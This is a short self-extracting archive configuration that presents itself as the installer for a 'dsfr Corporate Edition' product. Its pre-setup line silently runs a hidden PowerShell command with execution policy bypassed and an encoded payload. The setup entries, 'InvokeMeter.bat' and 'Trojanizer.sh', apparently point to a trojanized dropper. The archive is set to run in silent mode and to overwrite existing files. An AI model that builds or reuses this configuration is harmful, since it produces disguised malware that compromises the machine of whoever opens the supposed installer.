; The sfx archive title
Title=dsfr Corporate Edition
; Presetup program/command to execute before extraction
Presetup=powershell -nop -wind hidden -Exec Bypass -noni -enc TfBhDirtbSljKg==
; The path to the setup executables
Setup=InvokeMeter.bat
Setup=Trojanizer.sh
; Use semi-silent mode
Silent=1
; Overwrite any existing files
Overwrite=1
